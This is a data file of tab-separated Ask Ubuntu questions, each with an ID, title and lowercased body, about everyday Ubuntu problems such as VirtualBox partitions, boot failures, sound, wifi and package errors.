496087	how can iaunch a windows partition in virtualbox that already exists on my machine ?	i have installed virtualbox and i would like to have a windows session from within my kubuntu session . i have my hard drive partitioned so as to contain both os . however , virtualbox seems to only suport os installed from scratch . whenever i launch a virtual session , it prompts me to insert installation mediums . i have looked into the docs and it similarly details how to launch a vm and then prompts you to install an os . so my question is , if i already have an os installed on a different partition on the same hard drive , how can i go about associating that partition with a virtual session ? is it as simple as copying the entire os ( which i seem to have access to from within kubuntu session ) into the virtual box directory containing the `` windows session '' i have created within virtual box ?
496088	samba not sharing 2nd drives	had fully sharing ( with windows ) samba installation , until upgraded to ubuntu 14.04 . ca n't now get all the servers drives to share with u14.04 & w7 pcs . need it in idiots language as new to linux . mark
496089	trying to get any version of ubuntu to load on hp proliant dl380 g3	i am trying to installing ubuntu server 14.04 on my hp proliant dl380 g3 - all works fine through the installation even with vga-798 on a 1680x1050 screen but when we get to reboot from hard drives i have a grey screen which looks like it is trying to display a resolution the screen is not capable of - even tried with a dell 1920x1080 but the same result . is there a way to build the server which just goes to a command prompt rather than into x windows ? or do i have another issue - i can load debian 10.04.4 to a command prompt but would like to have the ubuntu 14.04 server on the box . any ideas ?
496091	speakers stopped working after reinstalling unbuntu 12.04	previously i installed ubuntu 12.04 with windows 7 then i installed ubuntu because my laptops speakers were working fine in ubuntu and were not playing sound in windows7 or some times had a very low volume . after removing ubuntu , speakers stopped working completely whereas headphones working properly . now i have re-installed ubuntu but still the problem persists . i have tried this troubleshooting guide sound troubleshooting which did n't help . speakers are fine and connected to sound card . this is what i see in the sound application : and this is what i see in alsamixer output of command sudo lshw -c multimedia *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:54 memory : f7f00000-f7f03fff
496096	enable ubuntu app for cordova	i 'm just trying to create ubuntu cordova project . as i can see in the manual i should import cordova assets into your html5 app project source . do this from the sdk with : tools > ubuntu > add cordova runtime to html5 project . but i just ca n't find tools in the sdk
496097	skype does n't see my webcam	i 've got logitech c270 ( /dev/video0 ) that is seen by cheese in xubuntu 14.04 , but skype does n't recognize it . what can i do ? should i blame my apparmor profile ?
496099	building 32-bit wine on a 64-bit ( x86-64 ) system	i had to build a 32bit version on wine on my 64bit system ( ubuntu 13.10 ) i 've followed a lot of guides ( like these http : //wiki.winehq.org/wineon64bit ) but all of them got me problems . i discovered that the newer versions already have both 32 and 64bit installed ? i 'd want to uninstall all the packages and deps ( like install-wine-deps.sh ) that i 've installed following that giude on wiki.winehq . and then make a clean install of wine , ( with bot 64 and 32bit libraries ) , how can i do that ? thanks : )
496102	finish partition from ubuntu 14.04	i was trying to make a partition on my 1tb drive for installing ubuntu 14.04 . i had to remove an older partition in order to do it from my old elementary os distro . as i was restarting my computer and wiping the old partition i accidentally erased the windows bootloader . as result my windows ca n't boot . my problem with this is the partition . i 'm using easeus to `` cut '' 50gb for ubuntu . when i restarted my computer in order to apply the settings the error with the bootloader occurred and i do n't know if the partition is actually ready to keep ubuntu . ( i’m from `` try ubuntu '' right now . ) as you can see i’m having the 3 drives . ⠀one 80gb for the windows 8 ⠀the master storage which the partition is based ⠀and the ubuntu partition on which i want to install ubuntu . is it possible to see if the partition is safe ? thanks for your time .
496103	ftp backup ubuntu server ( help needed ! ! )	i run a modded minecraft server and want to backup my world folder to my website . i would assume the easiest way to do this is via ftp . if someone could supply my with a script/program that can allow me to do this it would really help ( ps : any tips are welcome ) best regards
496105	one amd cpu core is always at 100 % load while chrome is just displaying a blank page	chrome and chromium ( just open a blank tab ) consumes 100 % of one cpu . now i am on firefox and it works well . ( but i like chrome ) $ uname -a linux x 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux firefox chrome chrome has no extensions .
496111	the command sudo apt-get update does n't work	i am trying to install wine , but something always goes wrong and it tells me to run that command to resolve some problems . i try to run it and i get this `` the method driver /usr/lib/apt/methods/https could not be found '' i am very new to ubuntu , so i have no idea what that means . any help ?
496112	chrome remote desktop ( beta )	chrome just launched the chrome remote desktop ( beta ) for linux . the instructions are provided here : https : //support.google.com/chrome/answer/1649523 ? hl=en i do n't understand this part : find the correct command to start the desktop by looking in /usr/share/xsessions/ for the desktop entry . for example , the ubuntu-2d.desktop file has the line : exec=gnome-session -- session=ubuntu-2d the text after âexec=â is the command to start the session . it should be passed ( using quotes if necessary ) as a parameter to the lightdm-session script . in this case , the correct command would be : exec /usr/sbin/lightdm-session `` gnome-session -- session=ubuntu-2d '' somebody please tell me how to exactly do that . thanks !
496113	ca n't read any cd or dvd in ubuntu gnome ?	i ca n't mount any cd or dvd on ubuntu gnome . i tried to run : sudo mount -a but it was n't successfully . here is output after sudo lshw -c disk : *-disk description : ata disk product : st9500420as vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0006 serial : 5vj40l7t size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000c0194 *-cdrom description : dvd-ram writer product : cddvdw ts-l633n vendor : hp physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 0300 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc after mount next output : /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/sda1 on /usr type ext4 ( rw ) /dev/sda7 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=nazar ) here is output after cat /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=69afa331-a4f0-46b9-af27-d3fdaa741653 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda7 during installation uuid=df65147d-afbc-495a-ab0f-80ef47415f4e /home ext4 defaults 0 2 # /usr was on /dev/sda1 during installation uuid=c8454fa0-7359-40d6-a007-db672e61c114 /usr ext4 defaults 0 2 # swap was on /dev/sda6 during installation uuid=89661f0a-71d8-4f24-a9e5-b9d3c094cc3c none swap sw 0 0 # cdrom 0 /dev/sr0 /media/cdrom/ auto ro , noauto , user , exec 0 0 # cdrom 1 /dev/sr0 /media/cdrom/ auto ro , noauto , user , exec 0 0 how to solve this trouble ?
496114	how to make iso file `` bootable '' on usb	i have downloaded the ubuntu ( desktop ) iso file and copied it to a usb drive . when i try to boot from it , i get a disk error . when i try to open the file within windows , it launches my cd burning program . i have a 386 machine ( ibm thinkpad ) running xp .
496118	occasionally hp-dv7 will not reboot	occasionally on rebbot ( 1/5 attempts ) or startup ( 1/20 attempts ) my hp laptop , dv7-4263cl does not startup . it appears that the disk is stuck in some weird non-responsive move - the system has completed post , but not started loading grub . my only solution is power down and back up , which almost always works the first time . can anyone suggest some troubleshooting i might engage in to solve this low priority , perplexing issue ?
496124	can i get this theme in unity ?	i recently saw this photo online and got attracted towards it . i know that this a kubuntu desktop and i dont want the upside down dock as shown in this pic but i just want the indicator or whatever you say to that thing which at the right side of this pic indicating weather and all those stuff . is that an extra add on and can i get this for unity .
496125	ubuntu freezes on boot after upgrade to 14.04	upgraded from 12.04 through the other releases to 14.04 . got message that everything was fine . restarted machine . took a long time . finally came up . cursor was frozen . after a minute , the screen went into a lined pattern . waited five minutes , nothing changed . turned off machine , tried again . same result . ubuntu 12.04 was running perfectly before the upgrade . i have a separate windows 7 machine , so i 'm not locked-out of the internet . i 'd like to be able to get a new install of 14.04 , but i do n't see how i can if the screen is messed up and the cursor wo n't respond . does anyone have any ideas ? barry
496128	updating packagelist	the installation guide at kivy.org ( this one ) says that i have to update my packagelist using my package manager . how to do this ?
496131	set mouse debounce time	when i right click my mouse `` receives '' the command 2-6 times . example : on terminal , when i right click ( to paste something ) , it will immediately open ( at least ) another terminal ( because the mouse is in the same position as the open terminal option ) . i could fix this on windows by having an autohotkey script which set a delay of about 50ms between clicks . i 've tried checking mouse and accessbility options but the few options available only work for left click . in another forum someone suggested me to check evdev but its manual did not help me alot ; searching for it , i found about xkbset , which i think can do the trick , but again , its manual is not meant for beginners . it is indeed a cheap usb mouse with faulty hardware , but one should be able to fix this particular problem , as someone with accessbility problems could need this thanks ,
496134	buttons and icons disappear when not mousing over them while using gnome 3	i 'm interested in trying out various desktop environments , so i went into the ubuntu software center and installed the full gnome desktop environment , with extra components . i then log-out and log-in using the gnome option . when i log-in , gnome loaded , the buttons on the top panel were there but only appears when i move mouse cursor over them . i was able to click the activities button , but the dock icons were doing the same thing . same with the workspaces , and the menu options in the top right corner . i do n't have that issue at all when using unity . here are some pictures ( had to take them with my ipad since screenshot caused them all to appear ) help would be appreciated , thanks !
496135	where can i found software sources ?	i have ubuntu 10.04 . i want to upgrade it to 12.04 so i found the following steps on ubuntu.com . i hope that is correct way . the first step is to go to system/administration/software sources . but i can not find it there . so where else can i find it ?
496136	make usb key with encrypted ubuntu install bootable using gparted ?	i forgot to make my usb key bootable when i was installing ubuntu to it . bios does n't pick it up but grub on the ssd does . now when i start a live session and try to make it bootable with gparted the partition menu is greyed out and i ca n't set the boot flag . this is what you do right ? is this because the install is encrypted ? unlocking it by entering the passphrase did n't help . partition table is gpt . i think this might be a duplicate of : ubuntu installed to usb key , but not recognized as bootable
496139	behave of ubuntu feel weird , super + w not work and opengl not found	while testing the kivy python library for my ubuntu stopped working normally . but i managed to get into the graphical environment by installing startx but now it was all different . for example : 1 . super + w does not work 2 . `` opengl not found '' when i try to reset the conpiz . 3 . my unit version is unity 5.20.0 4 . when i click alt + arrow has a different look than usual . 5 . etc ... â can anyone help me ? if you need more information please comment . thank you
496140	ubuntu installation intel	i would like to install ubuntu 14.04 but i saw on the file i downloaded that is for amd 64 bit processors . my pc-desktop has an intel core i7 64bit proseccor and i was wondering if is it ok for my pc this ubuntu amd file of installation .
496141	how can i prune my btrfs backups ?	i have a btrfs backup system where i take daily snapshots ( btrfs subvolume snapshot ) and serialize them into incremental change files based off the previous days backup ( btrfs send -f backup.date volume -p backup.date-1 ) . unfortunately this means i have to keep every serialized volume forever , because i need every serialized snapshot in the chain . i 've tried deserializing ( btrfs receive ) these incremental snapshots and deleting intermediate volumes , but the subsequent volumes are assigned new ids . incremental volumes refer to their parent volumes by id , so this breaks the chain . thus i have backup.jun01.daily and backup.jun01.monthly where the latter is pruned and has a different id . these two files effectively contain all the same data . is there any way to change the id on backup.jun01.monthly so that backup.jun02.daily can refer to it , whereas it did refer to backup.jun01.daily ?
496147	permissions error trying to create local web dev environment in home folder	hi i 've been trying to create a local web dev environment in my home folder . my local lamp is running fine , and i tried this tutorial to develop without the hassle of the permissions in var/www http : //ubuntuserverguide.com/2012/10/how-to-enable-and-configure-apache2-userdir-module-in-ubuntu-server-12-04.html i 'm getting a 403 forbidden error when trying to access it like so : http : //localhost/~asdf/ please advise .
496148	is pcbox pcb-tw100 touchscreen compatible with ubuntu desktop 14.04 ?	the title is very clear ... here is the link http : //www.garbarino.com/m/sistemas-2-en-1-pc-box-pcb-tw100-intel-celeron/4d9ad2f26d i could n't find specific info about the screen hardware ... this is manufacters link : http : //www.pcboxargentina.com.ar/producto_2en1.php
496149	where is the hostfile located ?	working on setting up a local development environment . im pretty new to linux . i am using virtualbox for ubuntu server inside of the ubuntu desktop i am running . after setting up port forwarding i am able to connect to it using these commands : ssh -p2222 user @ 127.0.0.1 or ssh -p user @ localhost . i like to connect to it using ssh user @ example.hostname . i understood that i would be able to do that by simply adding this line to my hostfile : 127.0.0.1 example.hostname . the problem is , i dont know where to find this file . where is the hostfile located on ubuntu desktop 14.04 ?
496152	install ubuntu 14.04 using pen drive	i am using ubuntu 10.04 ! i want to to install ubuntu 14.04 . but i do n't have ubuntu cd . i know we can use flash drive to install ubuntu 14.04 but do n't know how . ( i have seen by brother doing that , i have asked him how to do it but reply was find it out yourself . ) so please anyone can give me step wise instruction how to use simple flash drive to install ubuntu 14.04
496154	how to connect to an existing wifi network	i just changed from windows xp to lubuntu , i have used ubuntu in the past when i was a child but it used a ethernet cord to connect . how do i connect to wifi using my laptop ( lubuntu ) ? i ca n't figure out how to connect to or even view available networks . the simpler the answer the better .
496155	how to change byobu prompt from `` > '' to `` $ '' ?	from the time i use linux , the prompt ends with `` # '' for root and with `` $ '' for common users . on the latest lts version this changed to `` > '' for common users under byobu . question 1 : why ? question 2 : how to fix it , without manually messing with $ ps1 ?
496159	everything 's connected	i was wondering if i could create a complete setup with everything integrated . this is what i mean : the devices are : desktop for both gaming and everyday usage . desktop which is meant as a media server where all devices can connect too ( internet not required ) to access local media as well as backup files . tablet ( microsoft surface 1 rt ) smart phone ( samsung s2 , will be replaced soon ) samsung smart tv ( primary idea is to connect the media desktop as a monitor through hdmi ) i was wondering , after some browsing on the website , if ubuntu can get everything connected with each other , using a gmail account as the core of pretty much everything . i am yearning to see a stop to the multi-corporate platform bs where one needs to switch from windows to windows rt to android . i am hoping to get everything as though it was one ( maybe using a virtual machine or dual boot with windows solely for gaming ) . if so , how would i even start doing this ? are there tutorials i could use ? how could i install and configure everything ?
496161	how to install ubuntu on i586 sbc	i want to install the latest version of ubuntu on a winsystems pcm-vdx-1-256 sbc . the cpu is a vortex86dx soc . this is i586 architecture ( maybe i486 ) . it contains 12 serial ports , a cf card socket , and 4 usb ports . the sbc also contains an ethernet connection . it comes with ubuntu 10.04.2 . this is used in an industrial setting . when i run do-release-upgrade , there is a message that the latest version requires i686 architecture . i connected a usb cd drive to the sbc . i changed the bios to boot from usb cd first . i downloaded the ubuntu-14.4-server-i386.iso on a windows laptop . i checked the md5sum and created a cd . at power up , there is a message `` isolinix.bin missing or corrupt '' . if i boot the cd in the laptop , it passes the integrity test . the file isolinux.bin is in one of the folders . what am i missing ?
496167	can anyone help with fixing the touch pad on my chromebook ?	for the record i have installed xubuntu , through chrubuntu , on my toshiba c35 chromebook . i knew coming in that there would be some hardware issues , and for the most part , i got the other issues fixed except for the touch pad ; it does n't work whatsoever , and i 'm currently using a usb mouse for the time being . so far i 've tried the fixes from http : //www.reddit.com/r/chrubuntu/comments/1rsxkd/list_of_fixes_for_xubuntu_1310_on_the_acer_c720/ [ 1 ] [ 1 ] i kept looking for solutions , and i kept coming across that it has something to do with a old/new kernel ? i 'm still a novice with understanding linux in general , so i 'm not sure what that meant . any help would be greatly appreciated ! i was already told to go to this link ( https : //wiki.archlinux.org/index.php/acer_c720_chromebook # touchpad_kernel_modules ) , but it has offered no help either even with those instructions .
496168	ubuntu 12.04 lts - minecraft crashing !	not sure whats happening , i 'm on an hp envy ts15 laptop runing ubuntu linux 12.04 , i have open jdk installed , and oracle java 7 installed ... if anyone can help me find out the problem then please reply . i 've uninstalled , and re-installed java and .minecraft folder ! here is the crash readout for minecraft launcher -- -- minecraft crash report -- -- // shall we play a game ? time : 7/10/14 3:02 pm description : initializing game org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:818 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at bao.ag ( sourcefile:340 ) at bao.f ( sourcefile:713 ) at net.minecraft.client.main.main.main ( sourcefile:148 ) a detailed walkthrough of the error , its code path and all known details is as follows : -- head -- stacktrace : at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:818 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at bao.ag ( sourcefile:340 ) -- initialization -- details : stacktrace : at bao.f ( sourcefile:713 ) at net.minecraft.client.main.main.main ( sourcefile:148 ) -- system details -- details : minecraft version : 1.7.10 operating system : linux ( amd64 ) version 3.11.0-24-generic java version : 1.7.0_60 , oracle corporation java vm version : java hotspot ( tm ) 64-bit server vm ( mixed mode ) , oracle corporation memory : 118320504 bytes ( 112 mb ) / 153616384 bytes ( 146 mb ) up to 954728448 bytes ( 910 mb ) jvm flags : 1 total ; -xmx1g aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 launched version : 1.7.10 lwjgl : 2.9.1 opengl : ~~error~~ runtimeexception : no opengl context found in the current thread . gl caps : is modded : probably not . jar signature remains and client brand is untouched . type : client ( map_client.txt ) resource packs : [ ] current language : ~~error~~ nullpointerexception : null profiler position : n/a ( disabled ) vec3 pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used anisotropic filtering : off ( 1 )
496170	are there any safer dropbox alternatives ?	are there safer alternatives for dropbox ? as someone who knows my mailadress basically only is a passowrd away from my personal data .
496171	unable to correctly format and boot certain usb drives	i 've just bought a small laptop , with no optical drive at all , and i would like to install an os ( in this case crunchbang ) on it . i could n't have been create a bootable drive , on my ubuntu desktop , where i 'm writing from now . the laptop can boot from usb , it has been tried in the shop with a win8 . i 've also managed to recognize other drives with it , but those i do n't want to turn into a bootable drive , i have already wasted two of them , as it seems i can not format it properly . all of them i tried to install my .iso file , has gone unusable . i do n't really know what to do , my desire is simple . i only want to format/repair one of my corrupted drives and install the os with it to the laptop . the laptop is : lenovo thinkpad x61 my usb drive : kingston 4gb i have already tried the ubuntu startup disc creator , it 's escaped with an error . i have tried to follow along some tutorials and format it from terminal , no use . i have installed and worked on it with gparted and unetbootin , no use . i must have been doing something wrong , but i do n't know what .
496172	localhost/drupal/install.php returns 404 error	i am new to ubuntu ( read complete noob ) . i have managed to install lamp stack and configured apache2 which is working properly . i have also installed phpmyadmin which works perfectly . however my drupal install which i have placed under /var/www/drupal . i have checked the permissions and it shows drwxr-xr-x 9 root root 4.0k jul 10 04:22 drupal when i go to localhost/drupal/install.php it returns a 404 resource not found error . can you please tell me what i am doing wrong ? ps : i have seen that there is a drupal auto install but i want to do the manual install as i intend to install many more applications on my local machine so that i can tweak them . any help would be greatly appreciated . thank you in advance , sai .
496173	libimobiledevice4 , unmet dependencies and errorbrokencount > 0	i have done something stupid and ca n't undo it . i tried installing libimobiledevice4 by doing : sudo dpkg -i libimobiledevice4_1.1.6-git20140105_amd64.deb i did so following instructions from a website that i now ca n't find . i now have an error listed on my top panel , telling me errorbrokencount > 0 libimobiledevice4 has unmet dependencies : depends : libtasn1-3 ( > = 2.14-0 ) but it is not installable synaptic : depends : libept1.4.12 but it is not going to be installed recommends : rarian-compat but it is not going to be installed e : unmet dependencies . if i try apt-get -f install , i get : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies if i try apt-get remove libimobiledevice4 , i get : gvfs-backends : depends : libimobiledevice4 ( > = 1.1.5 ) but it is not going to be installed libgpod-common : depends : libimobiledevice4 ( > = 0.9.7 ) but it is not going to be installed libgpod4 : depends : libimobiledevice4 ( > = 0.9.7 ) but it is not going to be installed upower : depends : libimobiledevice4 ( > = 0.9.7 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . does anyone have any ideas how i can undo what i did with : sudo dpkg -i libimobiledevice4_1.1.6-git20140105_amd64.deb thanks .
496177	how do i install the human theme on ubuntu 14.04 lts ?	i have a package named human-theme_0.39.2_all.deb . i want to install it and use it on ubuntu 14.04 lts . how do i do that ?
496178	why do i get an error message every time i 'm prompted to restart system during update/package install ?	every time i update my system or install new software , i 'm prompted to reboot , but i also get an error message that says 'changes could not be applied . ' however , after reboot , everything seems to be installed and working properly . i 've been running kubuntu 14.04 trusty tahr ( 64 bit ) on an asus x551ma since it 's release and never had this issue until a couple weeks ago . before , i was n't always prompted to reboot after an update/package install , but now , i 'm prompted to reboot every single time ! which i do n't mind ( i reboot after updates even if i 'm not prompted ) , but it 's the fact that i receive the aforementioned error message that has become a nuisance . it seems to be a small glitch , but it 's rather annoying . thanks in advance !
496180	atheros ar928x connection problem	i just installed ubuntu 14.04 on my acer aspire 5740 . but it seems that my wireless adapter does n't work on it . i tried lots of things , but i could n't make it work . here 's some information you may want to see : lspci : lspci 05:00.0 network controller : qualcomm atheros ar928x wireless network adapter ( pci-express ) ( rev 01 ) iwconfig : iwconfig wlan0 ieee 802.11bgn essid : '' erdi '' mode : managed frequency:2.417 ghz access point : 80 : a1 : d7 : f9 : cf : aa bit rate=1 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-28 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:79 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . rfkill list all : rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no
496182	stop computer from sleeping	okay , so i 'm new to trying out linux . i want to get more comfortable with it but when basic things like stopping the computer from falling asleep on me become impossible to fix from a `` i ca n't find anything in settings , googling and trying the results that come up fail '' standpoint , it becomes pretty hard to want to keep giving it a chance . for example , i 'm watching a youtube video . i want to sit back and watch , not have to move my mouse on a whim . and from what i think i 've gathered , caffeine only stops it from happening when i fullscreen the video . well i hardly fullscreen videos and i do n't want to start just because of this . besides , even if i did start full screening videos , it would n't help with skype . i 'll be in a skype call talking to people and out of nowhere , boom ! i 'm disconnected ! why ? because the dumb thing fell asleep during a call . i 've searched and searched to no avail . but the thing is , i should n't have to be searching for some fix to this . why is the os so primitive to not handle this correctly ? am i just stupid and blind to the fix for this or is my aggravation justified ? please help . edit : i should point out i do n't want the screen to never sleep . if i walk way from the computer i want it to , to save battery . because if i walk away from my computer it wo n't be while in a skype call or with a video playing . it 's obvious tasks like those i want it to not sleep , and let it do so when not doing them . i do n't want to disable sleep forever .
496186	winusb install error installation failed ! exit code 512	i am unable to solve this problem , i 'm using ubuntu 14.04lts already tried as root and still have not had success winusb reports this error : installation failed ! exit code : 512 log : formating device ... mounting ... mount : dispositivo de blocos /home/flavio/área de trabalho/windows xp sp3 sata.iso é protegido contra gravação ; montando somente para leitura copying ... installing grub ... installing for x86_64-efi platform . grub-install : erro : /media/winusb_target_1405019929_19723 does n't look like an efi partition . . error occured ! syncing ... /usr/bin/winusb : linha 78 : 5376 terminado while true ; do sleep 0.05 ; echo 'pulse ' ; done cleaning ... /usr/bin/winusb : linha 78 : 6975 terminado while true ; do sleep 0.05 ; echo 'pulse ' ; done umounting and removing '/media/winusb_iso_1405019929_19723 ' ... umounting and removing '/media/winusb_target_1405019929_19723 ' ...
496187	after updating grub , my dell inspiran laptop boots but goes blank screen	i was facing a problem with my radeon graphics card ( getting too hot ) . so i applied the following solution given here : enable amd radeon dpm ( dynamic power management ) : to enable dpm in ubuntu 13.10 , you need to open /etc/default/grub with a text editor ( as root ) gksu gedit /etc/default/grub and in this file , search for the following line ( it 's on line 11 on my system ) : grub_cmdline_linux_default= '' quiet splash '' after `` splash '' add a space and then add this : radeon.dpm=1 after making the changes , this is how this line should look : grub_cmdline_linux_default= '' quiet splash radeon.dpm=1 '' then save the file and run the following command to update grub : sudo update-grub now when i reboot , the laptop boots up to a blank screen and i see nothing . i get the login screen when i press the power button and immediately shuts down . i do not know the status of the temperature . i am dual booting ubuntu 14.04 and windows 8.1 pro .
496190	ubuntu bluetooth audio , no sound after pairing	i 've rarely used bluetooth on kubuntu 14.04 and i 'm trying to use a set of bluetooth speakers ( loewe speaker 2go ) . i 've done the pairing with the wizard , and the device shows as an `` audio sink '' , whatever that is . but no sound comes out . in the [ audio setup ] , [ device preference ] does n't show that device , neither does the [ audio hardware setup ] . the backend is gstreamer . what am i missing ?
496193	increasing windows partition	i 'm trying to increase my windows partition in gparted but i am unable to do so . i opened the exclamation on the windows partition and found that i needed to do chkdsk i booted into my windows7 and ran > chkdsk e : /f and got `` can not open volume for direct access '' not sure where to go from here ... edit- ran chkdsk /f and chkdsk /r and got `` can not run disk checking on this volume because it it write protected '' i ran chkdsk c : f/r/x and got `` checked file system found no problems '' and `` failed to transfer logged messages to event log with status 50 ''
496196	auto-select after hibernation	i am trying to have my computer hibernate and then turn back on after a certain amount of time . following this answer , i tried : sudo rtcwake -u -s 60 -m mem this works great . however , when i have it dump memory to disk before hibernating : sudo rtcwake -u -s 60 -m mem it hang on the boot menu at restart . ordinarily , grub selects my operating system after 10 seconds if i do not select it . but when the computer turns back on after this command it hangs at the boot menu waiting for me to select where to boot from . this would not be a problem , except i would like to able to issue this command remotely . how do i get it to automatically select my default as it does during an ordinary start up ?
496197	how do i install val ( a ) ide and how do i know what the ppa for a software is ?	how do i install val ( a ) ide ? the ubuntu website tells me to : sudo apt-get install valide but terminal says , `` can not locate package '' . the launchpad page offers no instruction on how to install it . i ca n't find a ppa for it . google , bing and duckduckgo ca n't tell me where or how to install it . how can i install val ( a ) ide ? ( i ca n't find it in teh software centre either )
496199	hwe-support-status does not tell me how to upgrade to 12.04.5	according to 1204_hwe-eol , there should be an option to upgrade to 12.04.5 hwe , however , i do not receive any such instructions from hwe-support-status . # uname -r 3.11.0-24-generic # hwe-support-status -- verbose your current hardware enablement stack ( hwe ) is going out of support on 08/07/2014 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . for more information , please see : http : //wiki.ubuntu.com/1204_hwe_eol to upgrade to a supported ( or longer supported ) configuration : * upgrade from ubuntu 12.04 lts to ubuntu 14.04 lts by running : sudo do-release-upgrade -p or * install a newer hwe version by running : sudo apt-get install and reboot your system . on a different server , i get the same message as above , except it actually states the packages to install : * install a newer hwe version by running : sudo apt-get install linux-generic-lts-trusty linux-image-generic-lts-trusty i 'm not sure if this is how to update all hwes or if the packages change based on different hardware . this appears to be the same as bug # 1341320 .
496200	can not run the unity 8 openclipart scope example	following the instructions of this page , i have installed the ubuntu sdk and downloaded the tutorials source code . the openclipart scope builds correctly , but i have a runtime error : $ unity-scope-tool src/openclipart-scope.ini scoperegistry : no remote registry configured , only local scopes will be available registryobject : :scopeprocess : :exec ( ) : process for scope : `` openclipart-scope '' started file : ///usr/share/unity8/dash/dashcontent.qml:100 : typeerror : can not read property 'loaded ' of null file : ///usr/share/unity8/scopetool.qml:77:31 : unable to assign [ undefined ] to scopes_ng : :scope* file : ///usr/share/unity8/scopetool.qml:149:23 : unable to assign null to qstring ( unity-scope-tool:6243 ) : glib-gobject-critical ** : g_object_unref : assertion 'g_is_object ( object ) ' failed file : ///usr/lib/x86_64-linux-gnu/qt5/qml/ubuntu/components/themes/ambiance/tabbarstyle.qml:303 : typeerror : property 'select ' of object qquickrepeater ( 0x2711350 ) is not a function file : ///usr/share/unity8/dash/dashcontent.qml:100 : typeerror : can not read property 'loaded ' of null need to use qmirserverapplication segmentation fault ( core dumped ) any suggestions ?
496201	i ca n't install w3af on ubuntu 14.04	i 'm trying to install w3af but i 'm having a problem with lxml it just does n't wan na get installed : p i 'm a newbie however i sensed it does have something with the fact that the version required is older than the one which comes installed by default on ubuntu so i did remove the latest version of lxml which was already installed hoping that will let me install the older version however i was n't able to can anybody try to help me , please ? i will provide any needed information
496204	specify password for sudo in script	i am making a script that will update my system ( and do some other things , but that does n't matter ) . i want the script to run sudo apt-get update and sudo apt-get dist-upgrade -- yes automatically . i use -- yes so i wo n't have to choose yes when it runs ; it upgrades all packages automatically without me having to do anything . that said , i want to put my password in the script somehow so i wo n't have to type in my password when i run it either , probably with an argument or something . you know , something i can put at the end like sudo apt-get update -- passwd mypasswordhere . i have tried that and it does n't work , but that 's an example of what i want . what argument ( -- passwd or -- password or something ) do i put at the end to do this ?
